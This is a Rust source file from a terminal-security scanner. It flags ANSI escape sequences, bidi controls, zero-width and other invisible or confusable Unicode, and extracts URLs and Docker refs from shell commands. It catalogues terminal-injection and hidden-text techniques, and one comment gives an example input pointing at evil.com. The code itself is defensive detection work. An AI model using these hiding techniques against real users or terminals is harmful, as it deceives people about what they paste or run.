// tirith_core — extract.rs: Tier 1 fast scanning, byte-level Unicode scanning,
// and Tier 3 URL extraction.

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
/// Context for Tier 1 scanning.
///
/// Selects which fast-path regex (if any) gates full analysis in `tier1_scan`.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
    /// Exec-time: command about to be executed (check subcommand).
    Exec,
    /// Paste-time: content being pasted (paste subcommand).
    Paste,
    /// File scan: content read from a file (scan subcommand).
    /// Skips tier-1 fast-exit, runs byte scan + configfile rules only.
    FileScan,
}
18
// Include generated Tier 1 patterns from build.rs declarative pattern table.
// `dead_code` is allowed here because the generated file may define items this
// module does not reference (only EXTRACTOR_IDS and the two patterns are used).
#[allow(dead_code)]
mod tier1_generated {
    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
}
24
/// Expose the build-time extractor IDs for test-time cross-referencing.
///
/// The slice comes from the same generated table as the Tier 1 patterns.
pub fn extractor_ids() -> &'static [&'static str] {
    tier1_generated::EXTRACTOR_IDS
}
29
/// Tier 1 exec-time regex — generated from declarative pattern table in build.rs.
/// Compiled once on first use; a compile failure here is a build-time pattern bug.
static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
});
34
/// Tier 1 paste-time regex — exec patterns PLUS paste-only patterns (e.g. non-ASCII).
/// Compiled once on first use, like `TIER1_EXEC_REGEX`.
static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
});
39
/// Standard URL extraction regex for Tier 3.
///
/// Two alternates: (1) scheme-full URLs (`http`/`https`/`ftp`/`ssh`/`git`),
/// and (2) scp-style remote specs (`user@host:path`). Whitespace, quotes, and
/// angle brackets terminate a match so a URL inside shell quoting does not
/// swallow the closing delimiter.
static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(
        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
    )
    .expect("url regex must compile")
});
47
/// Result of the paste-time raw-byte scan (`scan_bytes`): one boolean per
/// finding class plus per-offset details for reporting.
pub struct ByteScanResult {
    /// ESC-introduced sequences (CSI/OSC/APC/DCS) or a lone trailing ESC byte.
    pub has_ansi_escapes: bool,
    /// C0 controls other than LF/TAB/ESC, mid-stream CR, or DEL (0x7F).
    pub has_control_chars: bool,
    /// Bidirectional text controls (LRM/RLM, LRE..RLO, LRI..PDI).
    pub has_bidi_controls: bool,
    /// Zero-width characters (ZWSP/ZWNJ/ZWJ, BOM past offset 0, etc.).
    pub has_zero_width: bool,
    /// Input is not valid UTF-8 — a whole-input property, not per-offset.
    pub has_invalid_utf8: bool,
    /// Unicode Tags U+E0000–U+E007F (hidden-ASCII encoding).
    pub has_unicode_tags: bool,
    /// Variation selectors U+FE00–U+FE0F and U+E0100–U+E01EF.
    pub has_variation_selectors: bool,
    /// Invisible math operators U+2061–U+2064.
    pub has_invisible_math_operators: bool,
    /// Stealth-encoding Unicode spaces (U+2000–U+200A, U+205F).
    pub has_invisible_whitespace: bool,
    /// Hangul fillers (U+3164, U+115F, U+1160).
    pub has_hangul_fillers: bool,
    /// Characters visually confusable with ASCII (per the confusables tables).
    pub has_confusable_text: bool,
    /// Per-offset findings backing the flags above.
    pub details: Vec<ByteFinding>,
}
63
/// A single byte-scan finding anchored at a specific input offset.
pub struct ByteFinding {
    /// Byte offset into the scanned input where the finding starts.
    pub offset: usize,
    /// The (lead) byte at `offset`.
    pub byte: u8,
    /// Full Unicode codepoint for multi-byte characters (None for single-byte findings).
    pub codepoint: Option<u32>,
    /// Human-readable description. NOTE: `with_ignored_range` re-derives the
    /// `has_*` flags from this text's prefixes, so the wording is load-bearing.
    pub description: String,
}
71
72impl ByteScanResult {
73    /// Return a filtered view where findings whose offset falls inside `ignore`
74    /// are removed, and the `has_*` flags are re-derived from the survivors so
75    /// downstream tier-1/tier-3 gates stay consistent.
76    ///
77    /// Used by the inspection-subcommand carveout: bytes inside the inert arg
78    /// span of `tirith diff/score/why/...` commands shouldn't trigger Unicode-
79    /// style rules. `has_invalid_utf8` is a whole-input property and is left
80    /// unchanged.
81    pub fn with_ignored_range(mut self, ignore: &std::ops::Range<usize>) -> Self {
82        self.details.retain(|d| !ignore.contains(&d.offset));
83        // Re-derive flags from surviving details. Matched on description
84        // prefixes that correspond to each branch in `scan_bytes`.
85        self.has_ansi_escapes = false;
86        self.has_control_chars = false;
87        self.has_bidi_controls = false;
88        self.has_zero_width = false;
89        self.has_unicode_tags = false;
90        self.has_variation_selectors = false;
91        self.has_invisible_math_operators = false;
92        self.has_invisible_whitespace = false;
93        self.has_hangul_fillers = false;
94        self.has_confusable_text = false;
95        for d in &self.details {
96            let desc = d.description.as_str();
97            if desc.ends_with("escape sequence") || desc == "trailing escape byte" {
98                self.has_ansi_escapes = true;
99            } else if desc.starts_with("control character") {
100                self.has_control_chars = true;
101            } else if desc.starts_with("bidi control") {
102                self.has_bidi_controls = true;
103            } else if desc.starts_with("zero-width character") {
104                self.has_zero_width = true;
105            } else if desc.starts_with("unicode tag") {
106                self.has_unicode_tags = true;
107            } else if desc.starts_with("variation selector") {
108                self.has_variation_selectors = true;
109            } else if desc.starts_with("invisible math operator") {
110                self.has_invisible_math_operators = true;
111            } else if desc.starts_with("invisible whitespace") {
112                self.has_invisible_whitespace = true;
113            } else if desc.starts_with("hangul filler") {
114                self.has_hangul_fillers = true;
115            } else if desc.starts_with("confusable") || desc.starts_with("text confusable") {
116                self.has_confusable_text = true;
117            }
118        }
119        self
120    }
121}
122
123/// Tier 1: Fast scan for URL-like content. Returns true if full analysis needed.
124pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
125    match context {
126        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
127        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
128        // FileScan always proceeds to tier-3 (no fast-exit)
129        ScanContext::FileScan => true,
130    }
131}
132
133/// Scan raw bytes for control characters (paste-time, Tier 1 step 1).
134pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
135    let mut result = ByteScanResult {
136        has_ansi_escapes: false,
137        has_control_chars: false,
138        has_bidi_controls: false,
139        has_zero_width: false,
140        has_invalid_utf8: false,
141        has_unicode_tags: false,
142        has_variation_selectors: false,
143        has_invisible_math_operators: false,
144        has_invisible_whitespace: false,
145        has_hangul_fillers: false,
146        has_confusable_text: false,
147        details: Vec::new(),
148    };
149
150    // Check for invalid UTF-8
151    if std::str::from_utf8(input).is_err() {
152        result.has_invalid_utf8 = true;
153    }
154
155    let len = input.len();
156    let mut i = 0;
157    while i < len {
158        let b = input[i];
159
160        // Escape sequences: CSI (\e[), OSC (\e]), APC (\e_), DCS (\eP)
161        if b == 0x1b {
162            // CSI (\e[), OSC (\e]), APC (\e_), DCS (\eP) are the escape-sequence
163            // introducers used for terminal injection attacks.
164            if i + 1 < len {
165                let next = input[i + 1];
166                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
167                    result.has_ansi_escapes = true;
168                    result.details.push(ByteFinding {
169                        offset: i,
170                        byte: b,
171                        codepoint: None,
172                        description: match next {
173                            b'[' => "CSI escape sequence",
174                            b']' => "OSC escape sequence",
175                            b'_' => "APC escape sequence",
176                            b'P' => "DCS escape sequence",
177                            _ => "escape sequence",
178                        }
179                        .to_string(),
180                    });
181                    i += 2;
182                    continue;
183                }
184            } else {
185                result.has_ansi_escapes = true;
186                result.details.push(ByteFinding {
187                    offset: i,
188                    byte: b,
189                    codepoint: None,
190                    description: "trailing escape byte".to_string(),
191                });
192            }
193        }
194
195        // CR: only flag mid-stream CRs (display-overwriting attacks). Trailing
196        // CR and CRLF (Windows line endings) are benign clipboard artifacts.
197        if b == b'\r' {
198            let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
199            if is_attack_cr {
200                result.has_control_chars = true;
201                result.details.push(ByteFinding {
202                    offset: i,
203                    byte: b,
204                    codepoint: None,
205                    description: format!("control character 0x{b:02x}"),
206                });
207            }
208        } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
209            result.has_control_chars = true;
210            result.details.push(ByteFinding {
211                offset: i,
212                byte: b,
213                codepoint: None,
214                description: format!("control character 0x{b:02x}"),
215            });
216        }
217
218        if b == 0x7F {
219            result.has_control_chars = true;
220            result.details.push(ByteFinding {
221                offset: i,
222                byte: b,
223                codepoint: None,
224                description: "control character 0x7f (DEL)".to_string(),
225            });
226        }
227
228        // UTF-8 continuation byte? Decode the char and check it against every
229        // invisible/confusable class in one pass.
230        if b >= 0xc0 {
231            let remaining = &input[i..];
232            if let Some(ch) = std::str::from_utf8(remaining)
233                .ok()
234                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
235                .and_then(|s| s.chars().next())
236            {
237                if is_bidi_control(ch) {
238                    result.has_bidi_controls = true;
239                    result.details.push(ByteFinding {
240                        offset: i,
241                        byte: b,
242                        codepoint: Some(ch as u32),
243                        description: format!("bidi control U+{:04X}", ch as u32),
244                    });
245                }
246                // ZWSP, ZWNJ, ZWJ, BOM, CGJ, Soft Hyphen, Word Joiner.
247                // BOM (U+FEFF) at offset 0 is a file-encoding artifact, not an attack.
248                if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
249                    result.has_zero_width = true;
250                    result.details.push(ByteFinding {
251                        offset: i,
252                        byte: b,
253                        codepoint: Some(ch as u32),
254                        description: format!("zero-width character U+{:04X}", ch as u32),
255                    });
256                }
257                // Unicode Tags U+E0000–U+E007F (hidden-ASCII encoding).
258                if is_unicode_tag(ch) {
259                    result.has_unicode_tags = true;
260                    result.details.push(ByteFinding {
261                        offset: i,
262                        byte: b,
263                        codepoint: Some(ch as u32),
264                        description: format!("unicode tag U+{:04X}", ch as u32),
265                    });
266                }
267                // U+FE00–U+FE0F and U+E0100–U+E01EF.
268                if is_variation_selector(ch) {
269                    result.has_variation_selectors = true;
270                    result.details.push(ByteFinding {
271                        offset: i,
272                        byte: b,
273                        codepoint: Some(ch as u32),
274                        description: format!("variation selector U+{:04X}", ch as u32),
275                    });
276                }
277                // U+2061–U+2064.
278                if is_invisible_math_operator(ch) {
279                    result.has_invisible_math_operators = true;
280                    result.details.push(ByteFinding {
281                        offset: i,
282                        byte: b,
283                        codepoint: Some(ch as u32),
284                        description: format!("invisible math operator U+{:04X}", ch as u32),
285                    });
286                }
287                // Invisible whitespace (stealth-encoded spaces).
288                if is_invisible_whitespace(ch) {
289                    result.has_invisible_whitespace = true;
290                    result.details.push(ByteFinding {
291                        offset: i,
292                        byte: b,
293                        codepoint: Some(ch as u32),
294                        description: format!("invisible whitespace U+{:04X}", ch as u32),
295                    });
296                }
297                if is_hangul_filler(ch) {
298                    result.has_hangul_fillers = true;
299                    result.details.push(ByteFinding {
300                        offset: i,
301                        byte: b,
302                        codepoint: Some(ch as u32),
303                        description: format!("hangul filler U+{:04X}", ch as u32),
304                    });
305                }
306                // Math alphanumerics + hostname confusables.
307                if let Some(target) = crate::text_confusables::is_text_confusable(ch) {
308                    result.has_confusable_text = true;
309                    result.details.push(ByteFinding {
310                        offset: i,
311                        byte: b,
312                        codepoint: Some(ch as u32),
313                        description: format!(
314                            "text confusable U+{:04X} (looks like '{target}')",
315                            ch as u32
316                        ),
317                    });
318                } else if let Some(target) = crate::confusables::is_confusable(ch) {
319                    result.has_confusable_text = true;
320                    result.details.push(ByteFinding {
321                        offset: i,
322                        byte: b,
323                        codepoint: Some(ch as u32),
324                        description: format!(
325                            "confusable U+{:04X} (looks like '{target}')",
326                            ch as u32
327                        ),
328                    });
329                }
330                i += ch.len_utf8();
331                continue;
332            }
333        }
334
335        i += 1;
336    }
337
338    result
339}
340
/// Check if a character is a Unicode bidirectional control.
///
/// Covers the implicit marks (LRM/RLM), the embedding/override block
/// LRE..RLO (U+202A–U+202E), and the isolate block LRI..PDI (U+2066–U+2069).
fn is_bidi_control(ch: char) -> bool {
    ch == '\u{200E}' // LRM
        || ch == '\u{200F}' // RLM
        || ('\u{202A}'..='\u{202E}').contains(&ch) // LRE, RLE, PDF, LRO, RLO
        || ('\u{2066}'..='\u{2069}').contains(&ch) // LRI, RLI, FSI, PDI
}
358
/// Check if a character renders zero-width (invisible joiner/space class).
fn is_zero_width(ch: char) -> bool {
    const ZERO_WIDTH: &[char] = &[
        '\u{00AD}', // Soft Hyphen
        '\u{034F}', // Combining Grapheme Joiner
        '\u{180E}', // Mongolian Vowel Separator
        '\u{200B}', // ZWSP
        '\u{200C}', // ZWNJ
        '\u{200D}', // ZWJ
        '\u{2060}', // Word Joiner
        '\u{FEFF}', // BOM / ZWNBSP
    ];
    ZERO_WIDTH.contains(&ch)
}
373
/// Check if a character is a Unicode Tag (hidden ASCII encoding),
/// i.e. in the Tags block U+E0000–U+E007F.
fn is_unicode_tag(ch: char) -> bool {
    matches!(ch, '\u{E0000}'..='\u{E007F}')
}
378
/// Check if a character is a variation selector: VS1–VS16 (U+FE00–U+FE0F)
/// or VS17–VS256 (U+E0100–U+E01EF).
fn is_variation_selector(ch: char) -> bool {
    matches!(ch, '\u{FE00}'..='\u{FE0F}' | '\u{E0100}'..='\u{E01EF}')
}
383
/// Check if a character is a Hangul Filler (invisible Korean character):
/// U+3164 (Hangul Filler), U+115F (Choseong Filler), U+1160 (Jungseong Filler).
fn is_hangul_filler(ch: char) -> bool {
    let cp = ch as u32;
    cp == 0x3164 || cp == 0x115F || cp == 0x1160
}
393
/// Check if a character is an invisible math operator (Function Application,
/// Invisible Times, Invisible Separator, Invisible Plus): U+2061–U+2064.
fn is_invisible_math_operator(ch: char) -> bool {
    matches!(ch, '\u{2061}'..='\u{2064}')
}
399
/// Check if a character is a stealth-encoding whitespace variant:
/// U+2000 En Quad through U+200A Hair Space, plus U+205F Medium Mathematical
/// Space. These Unicode spaces are used in steganographic encoding (e.g. st3gg
/// confusable whitespace). Layout spaces (U+00A0 NBSP, U+202F Narrow NBSP,
/// U+3000 Ideographic) are deliberately excluded — they appear legitimately
/// in localized prose.
fn is_invisible_whitespace(ch: char) -> bool {
    matches!(ch, '\u{2000}'..='\u{200A}' | '\u{205F}')
}
421
/// Tier 3: Extract URL-like patterns from a command string.
/// Uses shell-aware tokenization, then extracts URLs from each segment.
///
/// Per segment this collects, in order:
/// 1. scheme-full / scp-style URLs from the command word, args, and leading
///    env-assignment values (proxy variables exempt);
/// 2. schemeless-host candidates for sink-context commands (docker-family and
///    scp/rsync excluded — they get their own handling);
/// 3. Docker image refs for docker/podman/nerdctl subcommands.
pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
    let segments = tokenize::tokenize(input, shell);
    let mut results = Vec::new();

    for (seg_idx, segment) in segments.iter().enumerate() {
        let sink_context = is_sink_context(segment, &segments);
        let resolved = resolve_segment_command(segment);

        // Suppress URL extraction ONLY for the arg span of a first-segment
        // tirith inspection subcommand — not the whole segment. Leading env
        // assignments and wrapper tokens (sudo/env/time) must still be
        // analyzed; `FOO=https://evil.com tirith diff safe` must still flag
        // FOO. Since `resolved` can come through a wrapper, we first locate
        // where the literal "tirith" word lives in the segment.
        let inspection_skip_args_from: Option<usize> = if seg_idx == 0 {
            resolved.as_ref().and_then(|cmd| {
                if cmd.name != "tirith" {
                    return None;
                }
                // Locate the tirith word within the tokenized segment.
                let start_from: usize =
                    if segment.command.as_deref().map(command_base_name).as_deref()
                        == Some("tirith")
                    {
                        0
                    } else if let Some(at) = segment
                        .args
                        .iter()
                        .position(|a| command_base_name(a) == "tirith")
                    {
                        at + 1
                    } else {
                        return None;
                    };
                // Skip flags (e.g. `--quiet`) after the tirith word to land
                // on the subcommand token.
                let mut i = start_from;
                while i < segment.args.len() {
                    let clean = strip_quotes(&segment.args[i]);
                    if clean.starts_with('-') {
                        i += 1;
                        continue;
                    }
                    break;
                }
                // `i` may equal args.len() here; `get` + `?` bails to None.
                let sub_arg = segment.args.get(i)?;
                if is_tirith_inspection_subcommand(&command_base_name(sub_arg)) {
                    Some(i)
                } else {
                    None
                }
            })
        } else {
            None
        };

        // Extract standard URLs from command + args plus leading env-assignment values.
        // Keep the raw-text expansion targeted so output/auth false-positive suppression
        // still applies to the command/arg path.
        let mut url_sources: Vec<&str> = Vec::new();
        if let Some(ref cmd) = segment.command {
            url_sources.push(cmd.as_str());
        }
        for (arg_idx, arg) in segment.args.iter().enumerate() {
            // For tirith inspection subcommands, the subcommand word and all
            // later args form the inert arg span — don't extract URLs from them.
            if let Some(skip_from) = inspection_skip_args_from {
                if arg_idx >= skip_from {
                    break;
                }
            }
            url_sources.push(arg.as_str());
        }
        // Env-assignment values (`FOO=https://… cmd`) are URL sources too;
        // proxy variables are exempt because URLs are their legitimate content.
        for (name, value) in tokenize::leading_env_assignments(&segment.raw) {
            if ignores_env_assignment_url(&name) {
                continue;
            }
            let clean = strip_quotes(&value);
            if !clean.is_empty() {
                push_urls_from_source(&clean, seg_idx, sink_context, &mut results);
            }
        }
        for source in &url_sources {
            push_urls_from_source(source, seg_idx, sink_context, &mut results);
        }

        // Check for schemeless URLs in sink contexts
        // Skip for docker/podman/nerdctl commands since their args are handled as DockerRef
        let is_docker_cmd = resolved
            .as_ref()
            .is_some_and(|cmd| matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl"));
        if sink_context && !is_docker_cmd {
            if let Some(cmd) = resolved.as_ref() {
                // scp/rsync arguments are either (a) remote specs (handled by
                // parse_scp_remote_spec below) or (b) local file paths — never
                // schemeless domain candidates. Skip the schemeless heuristic
                // for these commands; scheme-full URLs still get caught by
                // URL_REGEX earlier. Without this skip, `scp test.asdf
                // host:/home/user/` trips on both the local filename (`.asdf`
                // TLD shape) and the remote spec (`host:path` shape).
                let is_remote_copy = matches!(cmd.name.as_str(), "scp" | "rsync");
                for (arg_idx, arg) in cmd.args.iter().enumerate() {
                    // Skip args that are output-file flag values
                    if is_output_flag_value(&cmd.name, cmd.args, arg_idx) {
                        continue;
                    }
                    let clean = strip_quotes(arg);
                    if is_remote_copy {
                        // Validate the spec shape when present, so downstream
                        // policy can consume it later, but don't emit schemeless
                        // for either remote specs or local files.
                        let _ = parse_scp_remote_spec(&clean, shell);
                        continue;
                    }
                    // Schemeless candidates must NOT also match the full URL
                    // regex, or they'd be double-reported.
                    if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
                        results.push(ExtractedUrl {
                            raw: clean.clone(),
                            parsed: UrlLike::SchemelessHostPath {
                                host: extract_host_from_schemeless(&clean),
                                path: extract_path_from_schemeless(&clean),
                            },
                            segment_index: seg_idx,
                            in_sink_context: true,
                        });
                    }
                }
            }
        }

        // Check for Docker refs in docker commands
        if let Some(cmd) = resolved.as_ref() {
            if matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl") {
                if let Some(docker_subcmd) = cmd.args.first() {
                    let subcmd_lower = docker_subcmd.to_lowercase();
                    if subcmd_lower == "build" {
                        // `docker build` takes the image ref from -t/--tag.
                        // Every other arg is build context / flags.
                        let mut i = 1;
                        while i < cmd.args.len() {
                            let arg = strip_quotes(&cmd.args[i]);
                            if (arg == "-t" || arg == "--tag") && i + 1 < cmd.args.len() {
                                let tag_val = strip_quotes(&cmd.args[i + 1]);
                                if !tag_val.is_empty() {
                                    let docker_url = parse::parse_docker_ref(&tag_val);
                                    results.push(ExtractedUrl {
                                        raw: tag_val,
                                        parsed: docker_url,
                                        segment_index: seg_idx,
                                        in_sink_context: true,
                                    });
                                }
                                i += 2;
                            } else if arg.starts_with("-t") && arg.len() > 2 {
                                // Inline form `-tname:tag`. The "-t" prefix is
                                // ASCII, so byte-slicing at 2 is safe.
                                let tag_val = strip_quotes(&arg[2..]);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else if let Some(val) = arg.strip_prefix("--tag=") {
                                let tag_val = strip_quotes(val);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else {
                                i += 1;
                            }
                        }
                    } else if subcmd_lower == "image" {
                        // `docker image pull/push/...` — the real subcommand is args[1].
                        if let Some(image_subcmd) = cmd.args.get(1) {
                            let image_subcmd_lower = image_subcmd.to_lowercase();
                            if matches!(
                                image_subcmd_lower.as_str(),
                                "pull" | "push" | "inspect" | "rm" | "tag"
                            ) {
                                extract_first_docker_image(&cmd.args[2..], seg_idx, &mut results);
                            }
                        }
                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
                        // First non-flag arg is the image; any later args are
                        // arguments to the containerized command, not refs.
                        extract_first_docker_image(&cmd.args[1..], seg_idx, &mut results);
                    }
                }
            }
        }
    }

    results
}
623
/// An extracted URL with context.
#[derive(Debug, Clone)]
pub struct ExtractedUrl {
    /// The matched text as found (quotes stripped for some sources).
    pub raw: String,
    /// Structured parse of `raw` (URL, docker ref, schemeless host, ...).
    pub parsed: UrlLike,
    /// Index of the tokenized shell segment this URL came from.
    pub segment_index: usize,
    /// True when the URL appeared in a sink context (see `is_sink_context`).
    pub in_sink_context: bool,
}
632
/// Common value-taking flags across docker subcommands.
///
/// `extract_first_docker_image` skips the token FOLLOWING any of these so a
/// flag's value is never mistaken for the image reference.
const DOCKER_VALUE_FLAGS: &[&str] = &[
    // Build / metadata.
    "--platform",
    "--format",
    "--filter",
    "-f",
    "--label",
    "-l",
    // Identity and runtime environment.
    "--name",
    "--hostname",
    "--user",
    "-u",
    "--workdir",
    "-w",
    "--network",
    "--net",
    "--env",
    "-e",
    "--env-file",
    // Networking, mounts, devices, lifecycle.
    "--publish",
    "-p",
    "--expose",
    "--volume",
    "-v",
    "--mount",
    "--add-host",
    "--device",
    "--entrypoint",
    "--log-driver",
    "--log-opt",
    "--restart",
    "--runtime",
    // Resource limits.
    "--cpus",
    "--cpu-shares",
    "--cpu-quota",
    "--memory",
    "--memory-reservation",
    "--memory-swap",
    "--shm-size",
    "--ulimit",
    "--security-opt",
    "--sysctl",
    "--tmpfs",
    "--gpus",
    // Namespaces.
    "--ipc",
    "--pid",
    "--userns",
    "--cgroupns",
];
682
/// Short flags that may embed their value inline (e.g., -p8080:80).
/// Matched by prefix + longer length, so a bare `-p` is not treated as inline.
const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
685
686/// Extract the first non-flag argument as a Docker image reference.
687fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
688    let mut skip_next = false;
689    let mut end_of_options = false;
690    for arg in args {
691        if skip_next {
692            skip_next = false;
693            continue;
694        }
695        let clean = strip_quotes(arg);
696        if clean == "--" {
697            end_of_options = true;
698            continue;
699        }
700        if !end_of_options && clean.starts_with("--") && clean.contains('=') {
701            continue;
702        }
703        if !end_of_options && clean.starts_with('-') {
704            if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
705                skip_next = true;
706            }
707            if DOCKER_VALUE_PREFIXES
708                .iter()
709                .any(|p| clean.starts_with(p) && clean.len() > p.len())
710            {
711                continue;
712            }
713            continue;
714        }
715        if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
716            let docker_url = parse::parse_docker_ref(&clean);
717            results.push(ExtractedUrl {
718                raw: clean,
719                parsed: docker_url,
720                segment_index: seg_idx,
721                in_sink_context: true,
722            });
723        }
724        // Only the FIRST non-flag arg is the image; anything else is the
725        // containerized command's argv.
726        break;
727    }
728}
729
/// A command resolved through wrapper chains (`sudo`, `env`, `time`, ...):
/// the effective command name paired with the wrapped command's args.
#[derive(Debug, Clone)]
struct ResolvedCommand<'a> {
    // Lowercased base name of the effective command (see `command_base_name`).
    name: String,
    // Args belonging to the effective command, borrowed from the segment.
    args: &'a [String],
}
735
736fn push_urls_from_source(
737    source: &str,
738    segment_index: usize,
739    in_sink_context: bool,
740    results: &mut Vec<ExtractedUrl>,
741) {
742    for mat in URL_REGEX.find_iter(source) {
743        let raw = mat.as_str().to_string();
744        let url = parse::parse_url(&raw);
745        results.push(ExtractedUrl {
746            raw,
747            parsed: url,
748            segment_index,
749            in_sink_context,
750        });
751    }
752}
753
/// True for env variables whose values legitimately hold URLs/hosts
/// (NO_PROXY, HTTP_PROXY, https_proxy, ...), so assignments to them are
/// not treated as URL sources.
fn ignores_env_assignment_url(name: &str) -> bool {
    name.eq_ignore_ascii_case("NO_PROXY") || name.to_ascii_uppercase().ends_with("_PROXY")
}
758
/// True for `env` long flags that take a value, whether written as
/// `--flag value` or `--flag=value` (the `=value` part is ignored).
fn env_long_flag_takes_value(flag: &str) -> bool {
    let name = match flag.split_once('=') {
        Some((name, _)) => name,
        None => flag,
    };
    matches!(name, "--unset" | "--chdir" | "--split-string")
}
763
764fn command_base_name(raw: &str) -> String {
765    let clean = strip_quotes(raw);
766    clean
767        .rsplit(['/', '\\'])
768        .next()
769        .unwrap_or(clean.as_str())
770        .to_lowercase()
771}
772
773fn resolve_segment_command(segment: &Segment) -> Option<ResolvedCommand<'_>> {
774    let command = segment.command.as_ref()?;
775    resolve_named_command(command, &segment.args)
776}
777
778/// Resolve a segment's command through wrappers (`env`, `command`, `time`,
779/// `sudo`/`doas`, `tirith`) and return the resolved name and the wrapped
780/// command's args. Callers outside the extractor (e.g. `check_network_policy`)
781/// use this so wrapped invocations like `sudo curl …` or `env curl …` get the
782/// same policy treatment as the bare command.
783///
784/// Returns `None` if the segment has no command or the wrapper chain can't be
785/// resolved (e.g. `sudo` with no command word).
786pub fn resolve_wrapped_command(segment: &Segment) -> Option<(String, Vec<String>)> {
787    let resolved = resolve_segment_command(segment)?;
788    Some((resolved.name, resolved.args.to_vec()))
789}
790
791fn resolve_named_command<'a>(command: &str, args: &'a [String]) -> Option<ResolvedCommand<'a>> {
792    let name = command_base_name(command);
793    match name.as_str() {
794        "env" => resolve_env_command(args),
795        "command" => resolve_command_wrapper(args),
796        "time" => resolve_time_wrapper(args),
797        "sudo" | "doas" => resolve_sudo_wrapper(args),
798        "tirith" => resolve_tirith_command(args),
799        _ => Some(ResolvedCommand { name, args }),
800    }
801}
802
803/// Resolve through a `sudo`/`doas` wrapper to the real command.
804///
805/// Handles common sudo flag shapes:
806/// - `sudo cmd args…`                                  → cmd with args
807/// - `sudo -u user cmd args…` / `sudo --user=user cmd` → cmd after the flag(s)
808/// - `sudo -E -H cmd args…`                            → cmd after flags
809/// - `sudo VAR=val cmd args…`                          → env assignment, cmd after
810///
811/// Unknown value-taking flags aren't special-cased; we honor only the common
812/// ones. Deliberately conservative: if we can't unambiguously resolve the
813/// command, return None and let the caller fall back to the literal first token.
814fn resolve_sudo_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
815    // Short sudo(8) flags that take a value.
816    //
817    // Boolean-only flags (-S stdin, -A askpass, -B bell, -E -H -K -L -l -n -P
818    // -s -V -v, and -h which is short for --help, not --host) must NOT be on
819    // this list — treating them as value-taking would eat the next token and
820    // break wrapped-command resolution.
821    const SUDO_VALUE_FLAGS: &[&str] = &["-u", "-g", "-p", "-C", "-D", "-U", "-r", "-t"];
822    // Long flags that take a value unless combined with `=`.
823    const SUDO_LONG_VALUE_FLAGS: &[&str] = &[
824        "--user",
825        "--group",
826        "--prompt",
827        "--close-from",
828        "--chdir",
829        "--other-user",
830        "--role",
831        "--type",
832        "--host",
833    ];
834
835    let mut i = 0;
836    let mut after_dashdash = false;
837    while i < args.len() {
838        let clean = strip_quotes(&args[i]);
839        if !after_dashdash && clean == "--" {
840            after_dashdash = true;
841            i += 1;
842            continue;
843        }
844        // Env-style assignments before the command (sudo VAR=val cmd)
845        if !after_dashdash && tokenize::is_env_assignment(&clean) {
846            i += 1;
847            continue;
848        }
849        if !after_dashdash && clean.starts_with("--") {
850            let name_part = clean.split_once('=').map(|(n, _)| n).unwrap_or(&clean);
851            if !clean.contains('=') && SUDO_LONG_VALUE_FLAGS.contains(&name_part) {
852                i += 2;
853            } else {
854                i += 1;
855            }
856            continue;
857        }
858        if !after_dashdash && clean.starts_with('-') {
859            if SUDO_VALUE_FLAGS.contains(&clean.as_str()) {
860                i += 2;
861                continue;
862            }
863            i += 1;
864            continue;
865        }
866        // First non-flag, non-assignment argument is the wrapped command.
867        return resolve_named_command(&clean, &args[i + 1..]);
868    }
869    None
870}
871
872fn resolve_env_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
873    let mut i = 0;
874    while i < args.len() {
875        let clean = strip_quotes(&args[i]);
876        if clean == "--" {
877            i += 1;
878            break;
879        }
880        if tokenize::is_env_assignment(&clean) {
881            i += 1;
882            continue;
883        }
884        if clean.starts_with('-') {
885            if clean.starts_with("--") {
886                if env_long_flag_takes_value(&clean) && !clean.contains('=') {
887                    i += 2;
888                } else {
889                    i += 1;
890                }
891                continue;
892            }
893            if clean == "-u" || clean == "-C" || clean == "-S" {
894                i += 2;
895                continue;
896            }
897            i += 1;
898            continue;
899        }
900        return resolve_named_command(&clean, &args[i + 1..]);
901    }
902
903    while i < args.len() {
904        let clean = strip_quotes(&args[i]);
905        if tokenize::is_env_assignment(&clean) {
906            i += 1;
907            continue;
908        }
909        return resolve_named_command(&clean, &args[i + 1..]);
910    }
911
912    None
913}
914
